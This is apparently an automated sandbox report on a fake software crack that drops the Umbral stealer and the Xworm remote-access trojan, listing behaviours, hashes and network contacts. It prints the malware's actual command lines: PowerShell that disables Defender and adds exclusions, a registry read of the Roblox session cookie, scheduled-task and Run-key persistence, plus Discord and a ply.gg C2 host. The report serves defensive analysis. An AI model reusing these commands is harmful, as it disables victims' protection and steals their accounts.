Analysis Overview
SHA256
471eeb9eeca3a3fb5bc949d95ddc7a29a8910a10b7567e725fc212c86c616b10
Threat Level: Known bad
The file AkrienPremiumCrack.zip was found to be: Known bad.
Malicious Activity Summary
Xworm
Umbral
Xworm family
Detect Umbral payload
Umbral family
Detect Xworm Payload
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Drops startup file
Reads user/profile data of web browsers
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Adds Run key to start application
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Detects videocard installed
Suspicious use of SetWindowsHookEx
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Scheduled Task/Job: Scheduled Task
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-10 12:30
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral family
Xworm family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-10 12:30
Reported
2024-07-10 12:32
Platform
win10-20240404-en
Max time kernel
78s
Max time network
81s
Command Line
Signatures
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rescache\_merged\1601268389\715946058.pri | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Windows\rescache\_merged\4183903823\2290032291.pri | C:\Windows\system32\taskmgr.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\AkrienPremiumCrack.zip
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-10 12:30
Reported
2024-07-10 12:33
Platform
win10-20240404-en
Max time kernel
81s
Max time network
81s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Umbral
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\AkrienPremium.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rescache\_merged\4183903823\2290032291.pri | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Windows\rescache\_merged\1601268389\715946058.pri | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Windows\rescache\_merged\4183903823\2290032291.pri | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Windows\rescache\_merged\1601268389\715946058.pri | C:\Windows\system32\taskmgr.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\AkrienPremium.exe
"C:\Users\Admin\AppData\Local\Temp\AkrienPremium.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\AkrienPremium.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 142.250.200.3:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
memory/4700-0-0x0000014E567A0000-0x0000014E567E0000-memory.dmp
memory/4700-1-0x00007FFE454A3000-0x00007FFE454A4000-memory.dmp
memory/4700-2-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/2412-7-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/2412-8-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/2412-9-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/2412-10-0x000001E2452F0000-0x000001E245312000-memory.dmp
memory/2412-13-0x000001E2454A0000-0x000001E245516000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_45pl0jm5.qs5.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2412-42-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/2412-49-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/2412-53-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f5122bab5a78c0f2f7beff7b27b0aba7 |
| SHA1 | 87150a8ec43199a57db5584479e81434240477cd |
| SHA256 | d6b067c4eefed2e15a65c8ebb2053af2fd7392701430363ee6ceaa4121def3c9 |
| SHA512 | e98d6b9200406b07236915b69e8e6bd6d5f8cc2cad8db91382bca2f08f9cd445eaa49a5f8e0cddd4160562a8138386fee947a5e2bc4657f1be33ba259fe44b99 |
memory/4700-86-0x0000014E70F30000-0x0000014E70F80000-memory.dmp
memory/4700-87-0x0000014E58400000-0x0000014E5841E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 98185f70e30865c647370a2d0bfc5882 |
| SHA1 | 47c5998dd519338f4567b543ca165405f0171afb |
| SHA256 | f19a1b762dbdac31d452c5acb50291dc85a0fd1e7609d2906d60d8e76320f0e7 |
| SHA512 | 523c0e85f81a2723aa7c0495963cf75902a2859d558d43a5f4dc22c383ad7fe43a83dd63dc5c130ba04bb28c04d5472743669e65459b941a029e2e90de6b1de4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 049309e5abbaed790ea8937ad3af8bb0 |
| SHA1 | 656e4a51d1a6ced6d02121b98a30f253a9feb3be |
| SHA256 | 78ffc1ea2fd3f668ac806db04a7f3523a3902ae45110cb7ed5f7f2517fdfb3d7 |
| SHA512 | 6498bc7895938120f17d57cc39b5f05d3201a560e8324587d55f39003fd9084e73964f2c057715bf0b9b56eb56e60cd6775785eda1be212a48c8722e172d5d04 |
memory/4700-151-0x0000014E70E30000-0x0000014E70E3A000-memory.dmp
memory/4700-152-0x0000014E70E60000-0x0000014E70E72000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8bff5cddd5a596df1e3576529ed9824b |
| SHA1 | 181415e3f641ba7e7d92e334d23592850020d94b |
| SHA256 | 00425ddcb8f8571890f15341f327c76fddf0a0171fe8618cca79648eba1f5745 |
| SHA512 | 098628ec36984858e9312441e0c956f08a684af7dab7cdbeedefef2fd04048cc8f0424d0d282c4a2f402f099d982275bc5df2770bec1123e978da9fb771758a8 |
memory/4700-182-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\zo8WX.scr
| MD5 | 049427153333cbb91ce24e1c36b4d911 |
| SHA1 | 583d712848e1f88af5692c745d6c8c2e54e07824 |
| SHA256 | b05886d5d5e49aba42b56f7f2e9095a8a3229b9dd0404667fa4be80e6f750984 |
| SHA512 | d4ed952c5ddc341da364b8db4a534b6e867bd9bb3b7702bd762ee8118086bceb58bdf475c269f032d9a7042d4f12f122c6954b5d3c3ef161b283af1ecd2d6640 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PRICache\4183903823\2290032291.pri
| MD5 | b8da5aac926bbaec818b15f56bb5d7f6 |
| SHA1 | 2b5bf97cd59e82c7ea96c31cf9998fbbf4884dc5 |
| SHA256 | 5be5216ae1d0aed64986299528f4d4fe629067d5f4097b8e4b9d1c6bcf4f3086 |
| SHA512 | c39a28d58fb03f4f491bf9122a86a5cbe7677ec2856cf588f6263fa1f84f9ffc1e21b9bcaa60d290356f9018fb84375db532c8b678cf95cc0a2cc6ed8da89436 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PRICache\1601268389\715946058.pri
| MD5 | 30ec43ce86e297c1ee42df6209f5b18f |
| SHA1 | fe0a5ea6566502081cb23b2f0e91a3ab166aeed6 |
| SHA256 | 8ccddf0c77743a42067782bc7782321330406a752f58fb15fb1cd446e1ef0ee4 |
| SHA512 | 19e5a7197a92eeef0482142cfe0fb46f16ddfb5bf6d64e372e7258fa6d01cf9a1fac9f7258fd2fd73c0f8a064b8d79b51a1ec6d29bbb9b04cdbd926352388bae |
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-10 12:30
Reported
2024-07-10 12:33
Platform
win10-20240404-en
Max time kernel
113s
Max time network
118s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Crack.lnk | C:\Users\Admin\AppData\Local\Temp\Crack.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Crack.lnk | C:\Users\Admin\AppData\Local\Temp\Crack.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Crack.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Crack.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\Crack = "C:\\Users\\Admin\\AppData\\Roaming\\Crack.exe" | C:\Users\Admin\AppData\Local\Temp\Crack.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rescache\_merged\1601268389\715946058.pri | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Windows\rescache\_merged\4183903823\2290032291.pri | C:\Windows\system32\taskmgr.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Crack.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\Crack.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Crack.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Crack.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Crack.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Crack.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Crack" /tr "C:\Users\Admin\AppData\Roaming\Crack.exe"
C:\Users\Admin\AppData\Roaming\Crack.exe
C:\Users\Admin\AppData\Roaming\Crack.exe
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Users\Admin\AppData\Roaming\Crack.exe
C:\Users\Admin\AppData\Roaming\Crack.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | connection-elect.gl.at.ply.gg | udp |
| US | 147.185.221.16:37777 | connection-elect.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 16.221.185.147.in-addr.arpa | udp |
| US | 147.185.221.16:37777 | connection-elect.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/3300-0-0x00007FF9D2D43000-0x00007FF9D2D44000-memory.dmp
memory/3300-1-0x0000000000C00000-0x0000000000C1C000-memory.dmp
memory/216-6-0x0000021961710000-0x0000021961732000-memory.dmp
memory/216-8-0x00007FF9D2D40000-0x00007FF9D372C000-memory.dmp
memory/216-11-0x00007FF9D2D40000-0x00007FF9D372C000-memory.dmp
memory/216-10-0x0000021979EF0000-0x0000021979F66000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_txwggdqf.e0q.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/216-20-0x00007FF9D2D40000-0x00007FF9D372C000-memory.dmp
memory/216-25-0x00007FF9D2D40000-0x00007FF9D372C000-memory.dmp
memory/216-51-0x00007FF9D2D40000-0x00007FF9D372C000-memory.dmp
memory/216-52-0x00007FF9D2D40000-0x00007FF9D372C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ad5cd538ca58cb28ede39c108acb5785 |
| SHA1 | 1ae910026f3dbe90ed025e9e96ead2b5399be877 |
| SHA256 | c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033 |
| SHA512 | c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 80b8902782f5462a10a0c8211472d125 |
| SHA1 | 7c141cdcaa8a5e5e7e183795bdd74d26371947b6 |
| SHA256 | 5420bfb7358267b2d9975668e956d72fa055cc8e5c6372ffbbcb28bab7f1bc61 |
| SHA512 | 4521207b84309f638e694ea6d006b709dd3ba365ecd544baa8fa36e6467cf6556db9bfaab44c092aa2dd69a3aeee7e5d7e49a33dd200455eb00a0e6b8a3df1c1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fcb83416686231654942728172d8ba1e |
| SHA1 | ffd0ee09dec4d66e8c211cb9ccd99b854e1f9760 |
| SHA256 | 93a594303a6dc748349cc904fb5228741a71bf7562e53ef88fa106eb2577fbaa |
| SHA512 | 72238f2373d9816228d74f21762ad6afbb5fe91e3b38de3384001ab98f87de3d1a89f10f53d01f24b1595885f720a19cc07adeebb9a691be3723fbb9dd783997 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0098df8ed31e9e8c46f9cf3e915fd432 |
| SHA1 | 0ed488512c3df40685aaf20dafd0296077d50bf9 |
| SHA256 | 496d2fb51dbd01e1c57c60622486980d8bf385e4a744b3fd00ceffa9d5d49732 |
| SHA512 | 3a54df779a5e3379a8d2506c4ac984bc95fab89423e8b152c52e890439afaaa13b8ec436eaf76bd439b5e744c6137c12a36eb05aa810642b1764ec29fa0046d8 |
memory/3300-186-0x00007FF9D2D40000-0x00007FF9D372C000-memory.dmp
memory/3300-187-0x00007FF9D2D40000-0x00007FF9D372C000-memory.dmp
C:\Users\Admin\AppData\Roaming\Crack.exe
| MD5 | fafdca52fa2f2e543c82157ab5bd3abe |
| SHA1 | 66b2fa2d9b1e58a67723fe98c08352f1668ea561 |
| SHA256 | fdd41c041dd827148ad8a15c521255c017f1977522a90ef4e94fb898c2a04477 |
| SHA512 | 28869228921b62f13a1975a75f9956909024fd5e59ff1a61152a38feb0cfcb128d76c4a6477b8b8701073e8faa0343612b2cdb94f24fd0ff73f04f98a4a7e561 |
memory/3300-192-0x0000000002BA0000-0x0000000002BAC000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Crack.lnk
| MD5 | bc93ad06d49df7b33daadcb348f26b15 |
| SHA1 | 22f0ad774a782a62720f2c955b2d55327471ca5b |
| SHA256 | ca450de834808efca47473eb0f0e2cd9da1352a5b3b3770d4f2a2fe2903104a4 |
| SHA512 | 07a2d08cbffb3daa65c5e274f04822b2f2aa753daded59c7494432dbef316a60339c9d72ff6f7eee6c2c400a009c4e1b9458626a501af406b72f329e3401cca4 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Crack.exe.log
| MD5 | 16c5fce5f7230eea11598ec11ed42862 |
| SHA1 | 75392d4824706090f5e8907eee1059349c927600 |
| SHA256 | 87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151 |
| SHA512 | 153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc |